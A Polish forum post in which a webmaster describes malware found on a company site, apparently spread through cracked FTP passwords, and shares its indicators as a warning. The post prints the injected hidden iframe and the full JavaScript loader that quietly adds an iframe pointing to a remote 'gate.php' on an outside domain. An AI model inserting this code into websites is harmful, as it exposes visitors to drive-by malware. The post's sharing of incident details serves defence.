Kod
<iframe src=http://unclesammm.com/gate.php?f="różne_id_liczbowe" frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=0 height=0 border=0></iframe>
OK, myślę sobie, standardowa procedurka, usunięcie z plików itp, nie problem. Zastanawiam się jednak którędy wszedł. Nie zapisuję haseł w Filezilli, oprogramowanie zabezpieczające na kompie aktualne. Podejrzewam, że skrypt jest dziurawy, bo trochę czasu powstał zanim do firmy przyszedłem i jest tak stary, że jeszcze session compatibility warning łapał z tego co widziałem. Chciałbym jednak sie dowiedzieć, czy są osoby, które z tym "wujkiem" zetkęły. Nie tylko się bowiem dodał na koniec, ale i z racji "leciwości" skryptu miał problem by pozostać niezauważony. Skopał bowiem dołączanie się do pliku i strona sypnęła syntax errorem. Tak go zauważyła osoba, która z owym skryptem pracuje i mnie powiadomiła. Ona dostępu nawet nie ma z poziomu ftp... Jedynie zalogowanie i użycie skryptu. Na pewno zmodyfikuję go tak, by zlikwidować mu potencjalne metody wejścia z poziomu formularzy, ale chciałbym wiedzieć, czy aby gdzieś indziej nie powinienem pogrzebać, bo się ukrył kopią czy coś w ten deseń. Dziękuje z góry za wszelką informację na temat tego konkretnego złośliwca, bo google skąpe informacje podaje i w zasadzie tylko mi powiedział, że to syfek. Nic więcej nie chciał

EDIT: Tak dla czytających. Jest to skrypt najprawdopodobniej już zablokowany, gdyż odwołania na domenę dają url not found, ale szkodnik modyfikuje napotkane pliki php z layoutem doklejając wspomniany iframe. Dodatkowo dokleja swój kod także do plików JS i z tego co wyłapałem, działa głównie łacząc sie z IP 178.63.141.211 oraz w pierwszej kolejności chcąc uzyskać dostęp do pliku z rozszerzeniem qpi w katalogu głównym domeny. Uważajcie więc na logi FTP, gdy coś w tym stylu wystąpi, bo to może być sygnał o problemie. Skrypt wbija się poprzez złamanie hasła do FTP któregoś z userów. Potem robi to, co opisałem.
EDIT2: By było łatwiej, umieszczam co dokleja chłopak do plików, zawierających tag </body> w php:
<!--qpi--><!--/qpi-->
oraz w JS:
/*qpi*/ function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false} var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled) { document.cookie='1=1;expires='+e.toGMTString()+';path=/'; window.setTimeout(function(){ var JSinj=document.createElement('iframe'); JSinj.src='http://unclesammm.com/gate.php?f=IDENTYFIKATOR&r='+escape(document.referrer||''); JSinj.width='0'; JSinj.height='0'; JSinj.frameborder='0'; JSinj.marginheight='0'; JSinj.marginwidth='0'; JSinj.border='0'; try{ document.body.appendChild(JSinj); }catch(e){ document.documentElement.appendChild(JSinj); } }, 2000); } /*qpi*/